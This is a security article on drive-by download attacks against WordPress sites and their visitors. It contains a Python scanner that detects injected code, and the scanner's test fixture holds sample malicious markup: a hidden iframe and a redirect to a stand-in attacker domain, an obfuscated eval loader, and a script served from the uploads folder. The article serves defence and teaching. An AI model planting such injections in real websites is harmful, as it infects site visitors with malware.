In previous articles we’ve talked about why criminals are interested in attacking WordPress sites and some of the methods they use. Today we’re going to look at drive-by downloads, a common category of attack used by criminals to infect site visitors with malware. Drive-by downloads are software downloads made to a device without the permission or knowledge of its owner.
Most such attacks are carried out through the compromised content management systems of otherwise legitimate sites, infecting those sites' visitors with malware that serves the attacker's interests.
This June, security researchers at Sucuri noticed that a large number of WordPress sites were being used by criminals to infect web users with ransomware, so it’s worth going into some detail about how attacks of this sort work.
When an attacker compromises a WordPress site (usually one that hasn't been updated), they're not necessarily interested in the site's own resources. They're interested in its audience. They want to use the site's reputation and traffic to their own advantage, infecting its visitors with ransomware, botnet software, banking and credit card stealers, and so on.
The first stage in a drive-by download attack is to find a vulnerable WordPress site and compromise it. Once the attackers control the site, they inject code into its pages and JavaScript files. The exact nature of the injected code varies, but its basic job is to make a visitor's browser fetch and run code hosted on a domain the attacker controls, without the visitor doing anything. That can be done with a plain redirect to the malicious site, an iframe (typically hidden or sized to a single pixel so nothing visible changes), or even an innocuous-looking advert.
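The injection patterns just described are exactly what a site owner should be grepping their pages and JavaScript files for after a suspected compromise. The scanner below is an added example written for this article, not code from the original post or from any product; it flags hidden iframes, redirects and iframes pointing off-site, obfuscated eval/unescape loaders, and script files served out of wp-content/uploads. The two sample pages, the example.invalid domain and the ALLOWED_HOSTS allowlist are constructed for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages for this example (not taken from any real site): one
# clean page, and one carrying the injection styles described above: a hidden
# iframe, a script that redirects the browser, an obfuscated eval/unescape
# loader, and a script file served out of wp-content/uploads.
CLEAN_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>var wpAjax = {url: "/wp-admin/admin-ajax.php"};</script>
</body></html>"""

INFECTED_PAGE = """<html><body>
<h1>Welcome</h1>
<iframe src="http://example.invalid/kit.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>window.location.replace("http://example.invalid/landing");</script>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%29'));</script>
<script src="/wp-content/uploads/cache.js"></script>
</body></html>"""

# Hosts this particular site is allowed to embed or redirect to. Hypothetical
# allowlist; a real one comes from the site's own theme and plugin inventory.
ALLOWED_HOSTS = {"www.youtube.com"}

# Markers of obfuscated loaders: eval/unescape/fromCharCode/atob and long runs
# of %XX or \xXX escapes. Legitimate minified code rarely needs these.
OBFUSCATION = re.compile(
    r"eval\s*\(|unescape\s*\(|String\.fromCharCode|atob\s*\("
    r"|(?:%[0-9a-f]{2}){8,}|(?:\\x[0-9a-f]{2}){8,}", re.I)

# Assignments or calls that send the browser somewhere else.
REDIRECT = re.compile(
    r"(?:window|top|self|document)?\.?location(?:\.href|\.replace|\.assign)?"
    r"\s*(?:=|\()\s*[\"']([^\"']+)", re.I)


class _TagCollector(HTMLParser):
    """Collects iframe attributes and script tags (src plus inline body)."""

    def __init__(self):
        super().__init__()
        self.iframes, self.scripts = [], []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script, self._buf = True, []
            self.scripts.append({"src": dict(attrs).get("src") or "", "body": ""})

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts[-1]["body"] = "".join(self._buf)


def _host(url):
    return (urlparse(url).hostname or "").lower()


def _is_hidden(attrs):
    """Zero/one-pixel iframes or ones styled invisible: no legitimate embed looks like this."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    sizes = {(attrs.get(k) or "").strip() for k in ("width", "height")}
    return bool(sizes & {"0", "1"}) or "display:none" in style or "visibility:hidden" in style


def scan_js(body, allowed_hosts=ALLOWED_HOSTS):
    """Findings for one script body (inline, or the contents of a .js file)."""
    findings = []
    if OBFUSCATION.search(body):
        findings.append(("obfuscated_script", body.strip()[:60]))
    for m in REDIRECT.finditer(body):
        host = _host(m.group(1))
        if host and host not in allowed_hosts:
            findings.append(("external_redirect", m.group(1)))
    return findings


def scan_html(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (kind, detail) findings for drive-by style injections in a page."""
    parser = _TagCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        if _is_hidden(attrs):
            findings.append(("hidden_iframe", src))
        elif _host(src) and _host(src) not in allowed_hosts:
            findings.append(("external_iframe", src))
    for script in parser.scripts:
        findings.extend(scan_js(script["body"], allowed_hosts))
        # uploads/ holds media, not code; a .js served from there is a classic
        # sign of an attacker-written file (heuristic, not from the article).
        if "/wp-content/uploads/" in script["src"] and script["src"].lower().endswith(".js"):
            findings.append(("script_from_uploads", script["src"]))
    return findings


if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("infected", INFECTED_PAGE)):
        print(name, scan_html(page))
```

Run scan_html over rendered pages (fetch them as an anonymous visitor; some injections only fire for non-logged-in users or specific referrers) and scan_js over every .js under wp-content and wp-includes. Treat hits as leads, not verdicts: legitimately minified or packed scripts can trip the obfuscation check, so confirm by diffing the file against a clean copy of the same theme or plugin version.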
The code the attacker wants to load is usually part of an exploit kit. Exploit kits like Nuclear and Angler are complex applications that probe the software on a visitor's device for vulnerabilities, often in the browser's PDF reader and Flash Player plugins. If the kit finds one, it exploits it to run a small dropper on the visitor's device, which in turn downloads the main malware payload. The entire process can take place in less than a second, with nothing for the visitor to click, and most people never notice that their device is now controlled by criminals.
So what can WordPress site owners do to minimize the chances that their sites will be compromised and used to infect visitors with malware? Most importantly, keep WordPress (and any other internet-facing software) up to date, and enable automatic updates where you can. It's hard to overstate how important this is: if your site is not updated regularly, it's almost certainly vulnerable. Themes and plugins need the same treatment, since a single outdated plugin is enough to hand an attacker the whole site.
While most WordPress sites are exploited because their owners don't update, a good number are hacked via simple brute-force attacks against the login form. Brute-force attacks only succeed against weak or reused passwords, so the second most important piece of advice is to use long, random, unique passwords for every account (administrator accounts above all), and to rate-limit or lock out repeated failed logins so that guessing is slow and noisy rather than free. For extra safety, implement two-factor authentication on your site.